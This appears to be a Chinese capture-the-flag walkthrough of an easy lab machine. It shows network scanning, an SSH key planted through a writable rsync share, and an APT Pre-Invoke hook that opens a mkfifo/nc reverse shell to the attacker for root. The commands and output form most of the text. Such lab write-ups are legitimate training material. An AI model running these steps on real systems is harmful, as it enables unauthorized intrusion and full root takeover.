难度:easy

kali:192.168.56.104

靶机:192.168.56.195

> arp-scan -l                 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:3d:d3:11       PCS Systemtechnik GmbH
192.168.56.195  08:00:27:da:3d:65       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 3 responded

端口扫描

> nmap 192.168.56.195
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 17:08 CST
Nmap scan report for 192.168.56.195
Host is up (0.0072s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
873/tcp open  rsync
MAC Address: 08:00:27:DA:3D:65 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

rsync远程连接

并不知道rsync服务是什么,经过搜索引擎知道
rsync是一个强大且高效的文件同步和备份工具,用于在本地和远程系统之间同步文件和目录。rsync 支持增量传输、压缩传输和排除特定文件等功能。rsync 服务(通常通过 rsync 守护进程实现)可以使文件同步过程更加自动化和灵活。

通过描述可以猜测这个服务可以文件传输,查询一下连接这个服务的指令

> rsync rsync://192.168.56.195                 

share           wally (home)
> rsync rsync://192.168.56.195/share/     

drwx------          4,096 2024/07/13 17:11:09 .
lrwxrwxrwx              9 2023/04/23 15:34:26 .bash_history
-rw-------            220 2023/01/15 20:58:06 .bash_logout
-rw-------          3,526 2023/01/15 20:58:06 .bashrc
-rw-------            807 2023/01/15 20:58:06 .profile
-r--------             33 2024/07/11 23:34:21 user.txt
drwx------          4,096 2024/07/13 16:32:43 .gnupg
drwxr-xr-x          4,096 2023/04/29 21:50:29 .local

拿到一个wally用户,先读一下flag

> rsync rsync://192.168.56.195/share/user.txt .
> cat user.txt      
9e1d45e31***********8760d2108

查了一下,还能写入文件,写个公钥进去

 /tmp                                                                                                                                                                                                                                                                                                 root@kali2  19:42:32 
> mkdir .ssh

 /tmp                                                                                                                                                                                                                                                                                                 root@kali2  19:42:35 
> cp /root/.ssh/id_rsa .ssh/                     

 /tmp                                                                                                                                                                                                                                                                                                 root@kali2  19:42:56 
> cp /root/.ssh/id_rsa.pub .ssh/authorized_keys 

 /tmp                                                                                                                                                                                                                                                                                                 root@kali2  19:43:25 
> rsync -avz .ssh rsync://192.168.56.195/share/

sending incremental file list
.ssh/
.ssh/authorized_keys
.ssh/id_rsa

sent 2,929 bytes  received 58 bytes  5,974.00 bytes/sec
total size is 4,150  speedup is 1.39

 /tmp                                                                                                                                                                                                                                                                                                 root@kali2  19:43:52 
> ssh -i id_rsa wally@192.168.56.195                         
Warning: Identity file id_rsa not accessible: No such file or directory.
Enter passphrase for key '/root/.ssh/id_rsa': 
wally@send:~$ id
uid=1000(wally) gid=1000(wally) grupos=1000(wally)

提权

sudo

wally@send:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for wally: 
sudo: a password is required

没有
SUID

wally@send:~$ find / -perm -4000   2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

没有
传个pspy64分析一下
发现了一个定时任务/usr/bin/apt-get update

2024/07/13 13:47:39 CMD: UID=0    PID=12230  | /usr/bin/apt-get update 
2024/07/13 13:47:39 CMD: UID=0    PID=12227  | /usr/bin/apt-get update 
2024/07/13 13:47:39 CMD: UID=0    PID=12226  | /bin/sh -c /usr/bin/apt-get update 
2024/07/13 13:47:39 CMD: UID=0    PID=12225  | /usr/sbin/CRON -f 
2024/07/13 13:47:39 CMD: UID=0    PID=12     | 
2024/07/13 13:47:39 CMD: UID=0    PID=110    | 
2024/07/13 13:47:39 CMD: UID=0    PID=11     | 
2024/07/13 13:47:39 CMD: UID=0    PID=109    | 
2024/07/13 13:47:39 CMD: UID=0    PID=108    | 
2024/07/13 13:47:39 CMD: UID=0    PID=107    | 
2024/07/13 13:47:39 CMD: UID=0    PID=106    | 
2024/07/13 13:47:39 CMD: UID=0    PID=105    | 
2024/07/13 13:47:39 CMD: UID=0    PID=103    | 
2024/07/13 13:47:39 CMD: UID=0    PID=10     | 
2024/07/13 13:47:39 CMD: UID=0    PID=1      | /sbin/init 
2024/07/13 13:48:01 CMD: UID=0    PID=13390  | /usr/sbin/CRON -f 
2024/07/13 13:48:01 CMD: UID=0    PID=13391  | /usr/sbin/CRON -f 
2024/07/13 13:48:01 CMD: UID=0    PID=13392  | /bin/sh -c /usr/bin/apt-get update 
2024/07/13 13:48:02 CMD: UID=0    PID=13393  | /usr/bin/apt-get update 
2024/07/13 13:48:02 CMD: UID=0    PID=13394  | /usr/bin/apt-get update 
2024/07/13 13:48:02 CMD: UID=0    PID=13395  | /usr/bin/apt-get update 

传入linpeas.sh分析

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                                                                                            
/dev/mqueue                                                                                                                                                                                                                                                  
/dev/shm
/etc/apt/apt.conf.d
/home/wally
/run/lock
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/inaccessible
/run/user/1000/systemd/inaccessible/dir
/run/user/1000/systemd/inaccessible/reg
/run/user/1000/systemd/units
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/index.html
/tmp/index.html.1
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory

/var/lib/php/sessions
/var/tmp

发现/etc/apt/apt.conf.d目录可写,真好结合定时任务apt-get update,写个配置文件让定时任务执行的时候执行里面的配置文件

wally@send:~$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 4567 >/tmp/f"};' > /etc/apt/apt.conf.d/tao

具体可参考https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
然后靶机监听就能拿到rootshell了

> nc -lvnp 4567      
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.195] 44056
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) grupos=0(root)